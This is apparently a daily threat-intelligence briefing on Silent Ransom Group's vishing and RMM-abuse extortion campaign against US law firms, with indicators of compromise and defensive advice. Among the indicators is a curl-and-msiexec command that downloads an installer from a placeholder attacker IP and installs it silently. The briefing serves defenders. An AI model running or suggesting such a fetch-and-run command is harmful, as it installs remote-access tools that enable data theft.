← Back to Daily Briefing

The threat actor known as Silent Ransom Group (UNC3753, also referred to as Luna Moth) is conducting high-tempo extortion campaigns against U.S. law and professional services firms. The attack chain utilizes spearphishing and vishing (T1566.004) to trick personnel into installing Remote Monitoring and Management (RMM) tools such as AnyDesk and SuperOps. Attackers then exploit BYOD endpoints to gain access to corporate Virtual Desktop Infrastructure (VDI), including Windows 365 and Citrix environments. Once inside, the group performs surgical data harvesting from document management systems like iManage, targeting PII and tax logs. The campaign is characterized by rapid execution—often completing the lifecycle within a single business day—and includes physical USB-based exfiltration.

  • Incident Overview: Rapid Extortion Lifecycle

    • Target Verticals: U.S.-based legal, financial, and professional services.
    • Operational Tempo: Highly aggressive; data theft can be initiated in under one hour.
    • Primary Objective: Exfiltration of sensitive client data followed by unbranded extortion via the 'LEAKEDDATA' site.
  • Attack Vector: Social Engineering and RMM Abuse

    • Initial Access: Low-friction invoice-themed emails followed by vishing (voice phishing) impersonating internal IT support.
    • Tool Deployment: Coercion of victims into hosting screen-sharing sessions via Zoom, Teams, or Quick Assist to install RMM tools (AnyDesk, Zoho Assist, SuperOps).
    • Lateral Movement: Pivoting from compromised BYOD (Bring Your Own Device) endpoints into protected corporate VDI (Windows 365/Citrix) environments.
    • Physical Intrusion: Deployment of actors posing as technicians to exfiltrate data via physical USB drives (T1052.001).
  • Data Exfiltration: Surgical Document Harvesting

    • Targeting Methodology: Keyword-based searches within document management systems like iManage to identify high-value targets.
    • Stolen Data Types: PII, SSNs, tax logs (W-2, W-9, 1099), and proprietary corporate client agreements.
    • Exfiltration Tools: Heavy reliance on Rclone, WinSCP, and Privnote for link delivery and cloud-based staging.
  • Indicators of Compromise (IoCs)

    • Network Indicators: 192.236.147.131, 192.236.147.138, 193.141.60.212, 192.236.154.158, 192.236.146.173, 174.169.162.62, 64.94.84.97.
    • Domain Patterns: <organization>-itdesk.com, <organization>-it.com, <organization>-helpdesk.com.
    • Execution Command: curl -sL "http://[actor-ip]/installer" -o "SuperOps.msi" && msiexec /i "SuperOps.msi" /quiet.
    • Data Leak Site: business-data-leaks[.]com.
  • Defensive Strategy and Mitigation

    • Access Hardening: Implement strict Zero Trust and conditional access policies to prevent unauthorized BYOD-to-VDI pivoting.
    • Endpoint Monitoring: Alert on unauthorized RMM software installations and anomalous mass file access within Document Management Systems (DMS).
    • Physical Security: Enforce strict USB port controls and mandate identity verification for all onsite technical personnel.
    • Awareness Training: Deploy specialized training focused on detecting sophisticated vishing and IT impersonation tactics.

Related posts

  1. cloudblog.withgoogle.com — Seeking Counsel: Ongoing Targeted Campaign Against US Law Firms
  2. Security Affairs — Silent Ransom Group (SRG): Switching To DNS Fast Flux Infrastructure
  3. Ic3
  4. Hipaajournal
  5. bleepingcomputer.com — Silent Ransom Group targets law firms with fake IT support calls
  6. Ic3
  7. Helpnetsecurity
  8. Esecurityplanet
  9. The Hacker News — UNC3753 Used Vishing and Physical Intrusions in U.S. Data Theft Extortion Campaign
  10. Reddit
  11. Austinlarsen
  12. Exchange
  13. Securityweek
  14. Securityaffairs
  15. Resecurity
  16. Hackread
  17. Socdefenders
  18. Inc
  19. Socprime
  20. Aha
  21. Therecord
  22. Kaufmanit
  23. Infosecurity-magazine
  24. Reddit
  25. Balleralert
  26. Cyberscoop
  27. Ashe
  28. Hivesecurity
  29. The-independent
  30. Facilitiesdive
  31. Dark Reading — Silent Ransom Group Hits US Law Firms in Escalating Extortion Attacks
  32. The Register - Security — Extortion crews are visiting law firms pretending to be tech support, FBI warns

LINK COPIED TO CLIPBOARD